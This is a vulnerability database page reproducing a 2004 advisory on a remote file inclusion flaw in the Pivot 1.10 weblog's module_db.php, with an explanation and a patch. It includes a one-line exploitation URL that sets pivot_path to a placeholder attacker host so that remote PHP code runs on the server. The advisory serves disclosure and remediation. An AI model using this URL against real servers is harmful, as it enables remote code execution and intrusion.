Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

pivot1.1.0SoundwaveAdv.txt

🗓️ 18 Jun 2004 00:00:00Reported by Alex Buck aka loofusType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 228 Views

Pivot is vulnerable to remote code execution via the module_db.php through unsanitized paths.

Code
`Pivot 1.10 Soundwave - Remote Code Execution  
--------------------------------------------  
loofus - 0x90.org  
  
Greets:  
-------  
Downbload, nummish, peace, war-cow & the rest of 0x90.org  
  
Description:  
------------  
Pivot is a tool to create weblogs, without the need of a database. Pivot is  
easy to setup, easy to maintain and even easier to work with. All data is  
stored using flat files. MySQL or other databases are not required, just  
plain PHP.  
  
Vulnerability:  
--------------  
The vulnerability is a remote file inclusion (hmm been seeing too many of  
these lately). Anywas, the vulnerability lies within a class file called  
module_db.php which is accessible individually. By supplying a malicious  
path variable the attack, is able to include any file he/she wishes and is  
able to include remote php code allowing local system access as whatever  
user PHP is runs scripts as most likely www-data.  
  
--- module_db.php ---  
// for now, we'll just use the xml / flat-file module..  
include_once $pivot_path."modules/module_db_xml.php";  
  
class db {  
  
--- module_db.php ---  
  
No check is done on module_db.php as it is assumed that noone will actually  
individually visit this file as it contains a class interface. The idea  
behind this is to include this file somewhere else within the code execution  
so that $pivot_path is properly set. However if register_globals is set to   
on within php.ini the attacker is able to hijack the variable $pivot_path  
and point it to somewhere else ("http://xxxxx/includes/module_db_xml.php").  
  
Exploitation:  
-------------  
http://xxxxx/pivot/modules/module_db.php?pivot_path=http://xxxxxx  
  
Fix:  
----  
--- module_db.php Wed Feb 11 16:29:04 2004  
+++ module_db.phpfix Fri May 28 22:36:07 2004  
@@ -10,6 +10,10 @@  
// Patch to fix remote include - loofus (0x90)  
// ---------------------------------------------------------------------------  
  
+/* Make sure user cannot include remote files */  
+if(isset($_GET['pivot_path']) || isset($_POST['pivot_path']) ||  
isset($_COOKIE['pivot_path']))  
+ die("No remote include for you!\n");  
+  
// for now, we'll just use the xml / flat-file module..  
include_once $pivot_path."modules/module_db_xml.php";  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
18 Jun 2004 00:00Current
7.4High risk
Vulners AI Score7.4
pivot toolremote code executionfile inclusion vulnerabilitymodule_db.phppatch fix.
228